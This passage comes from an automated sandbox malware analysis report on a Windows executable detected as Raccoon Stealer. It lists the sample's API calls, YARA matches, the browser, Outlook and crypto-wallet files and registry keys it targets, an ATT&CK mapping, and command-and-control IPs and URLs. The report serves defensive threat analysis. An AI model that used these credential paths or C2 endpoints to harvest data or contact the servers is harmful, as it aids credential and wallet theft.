Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043E1E9 SetUnhandledExceptionFilter,	1_2_0043E1E9
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004442E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004442E1
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0043E3FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0043E3FB

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	1_2_0043454E
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	1_2_0042982C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00460011
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: EnumSystemLocalesW,	1_2_00456257
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,	1_2_0046020C
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: EnumSystemLocalesW,	1_2_004602FE
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: EnumSystemLocalesW,	1_2_004602B3
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: EnumSystemLocalesW,	1_2_00460399
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00460424
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,	1_2_00460677
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0046079D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,	1_2_00456884
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetLocaleInfoW,	1_2_004608A3
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00460972

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043E2A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_0043E2A3

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

1_2_0043454E

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_00433F35 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

1_2_00433F35

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_00427858 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

1_2_00427858

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

1_2_00432621

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\electrum
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\electroncash
Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: heavy_ad_intervention_opt_out.db-journaly.jaxx
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum Wallet

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Source: Yara match

File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information3	Credentials In Files1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery26	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
KnZsSmDyF3.exe	63%	Virustotal		Browse
KnZsSmDyF3.exe	34%	Metadefender		Browse
KnZsSmDyF3.exe	75%	ReversingLabs	Win32.Ransomware.StopCrypt
KnZsSmDyF3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-interlocked-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.1.KnZsSmDyF3.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.2.KnZsSmDyF3.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141176		Download File

Domains

Source	Detection	Scanner	Label	Link
telete.in	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f2y	0%	Avira URL Cloud	safe
https://telete.in/jagressor_kz	12%	Virustotal		Browse
https://telete.in/jagressor_kz	0%	Avira URL Cloud	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f277U	0%	Avira URL Cloud	safe
http://94.228.114.197/2t	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f4	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://94.228.114.197/	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://94.228.114.197/I_	0%	Avira URL Cloud	safe
http://94.228.114.197/S	0%	Avira URL Cloud	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f	0%	Avira URL Cloud	safe
https://telete.in/jagressor_kzn-	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://94.228.114.197	0%	Avira URL Cloud	safe
http://94.228.114.197/dhHq	0%	Avira URL Cloud	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f=jsonoL	0%	Avira URL Cloud	safe
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
https://wa228.114.197/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
telete.in	195.201.225.248	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://telete.in/jagressor_kz	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://94.228.114.197/	false	Avira URL Cloud: safe	unknown
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f	false	Avira URL Cloud: safe	unknown
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	1xVPfvJcrg.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp	false		high
https://telete.in/org/img/t_logo.png	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	true	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f2y	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	1xVPfvJcrg.1.dr	false		high
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f277U	KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://94.228.114.197/2t	KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0renc	KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	1xVPfvJcrg.1.dr	false		high
http://cps.letsencrypt.org0	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.google.com/chrome/?p=pV	KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmp	false		high
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f4	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.i.lencr.org/0Y	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219853041.0000000000DB0000.00000004.00000001.sdmp	false		high
http://ocsp.thawte.com0	softokn3.dll.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.mozilla.com0	softokn3.dll.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	KnZsSmDyF3.exe, 00000001.00000003.217777569.0000000000DC3000.00000004.00000001.sdmp	false		high
http://94.228.114.197/I_	KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1xVPfvJcrg.1.dr	false		high
https://support.google.com/chrome/?p=plugin_flash	KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	1xVPfvJcrg.1.dr	false		high
http://94.228.114.197/S	KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0n_	KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	false		high
https://telete.in/jagressor_kzn-	KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0H	KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0	KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	1xVPfvJcrg.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	softokn3.dll.1.dr	false		high
https://support.google.com/chrome/?p=plugin_shockwave	KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmp	false		high
http://x1.c.lencr.org/0	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://x1.i.lencr.org/0	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.o.lencr.org0	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://94.228.114.197	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	1xVPfvJcrg.1.dr	false		high
http://94.228.114.197/dhHq	KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f=jsonoL	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.1.dr	false		high
http://cps.root-x1.letsencrypt.org0	KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	1xVPfvJcrg.1.dr	false		high
https://wa228.114.197/	KnZsSmDyF3.exe, 00000001.00000002.220797019.000000004C8CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.228.114.197	unknown	Russian Federation		61333	ASTRALUSDE	false
195.201.225.248	telete.in	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452449
Start date:	22.07.2021
Start time:	11:27:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	KnZsSmDyF3.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/66@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 120 Number of non-executed functions: 73
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.139.144 Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:27:59	API Interceptor	5x Sleep call for process: KnZsSmDyF3.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
94.228.114.197	sahnLAfk8q.exe	Get hash	malicious	Browse	94.228.114.197/
	ToJlbACJwu.exe	Get hash	malicious	Browse	94.228.114.197/
	XTRCesNoKU.exe	Get hash	malicious	Browse	94.228.114.197/
195.201.225.248	http://telete.in	Get hash	malicious	Browse	telete.in/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
telete.in	sahnLAfk8q.exe	Get hash	malicious	Browse	195.201.225.248
	ToJlbACJwu.exe	Get hash	malicious	Browse	195.201.225.248
	XTRCesNoKU.exe	Get hash	malicious	Browse	195.201.225.248
	CY551p1KKD.exe	Get hash	malicious	Browse	195.201.225.248
	IbBzKuh5S1.exe	Get hash	malicious	Browse	195.201.225.248
	Xg19BRCY6E.exe	Get hash	malicious	Browse	195.201.225.248
	WV1EJvdiHA.exe	Get hash	malicious	Browse	195.201.225.248
	SecuriteInfo.com.Trojan.Win32.Save.a.3056.exe	Get hash	malicious	Browse	195.201.225.248
	V55asvIc9V.exe	Get hash	malicious	Browse	195.201.225.248
